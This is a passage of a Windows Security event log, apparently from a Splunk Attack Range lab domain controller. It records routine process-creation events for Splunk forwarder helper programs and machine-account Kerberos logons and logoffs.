Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:34:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264766
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x19b8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:34:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264768
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xc98
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:34:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264769
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x187c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:34:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264771
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x15c0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:34:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264770
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x193c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:34:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264772
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x862754
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:34:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264775
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x865987
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:34:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264774
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x865987
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 53669
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:34:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264773
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x865987
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:35:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264776
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1678
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:35:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264778
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x554
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:35:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264777
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b68
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:35:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264779
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xee8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:35:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264780
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b80
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:35:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264782
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x15ac
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:35:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264781
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x199c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:35:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264785
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x86937B
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:35:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264784
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x86937B
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 53682
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:35:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264783
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x86937B
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:36:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264786
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a78
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:36:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264788
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x16d0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:36:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264787
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x16c4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:36:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264789
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
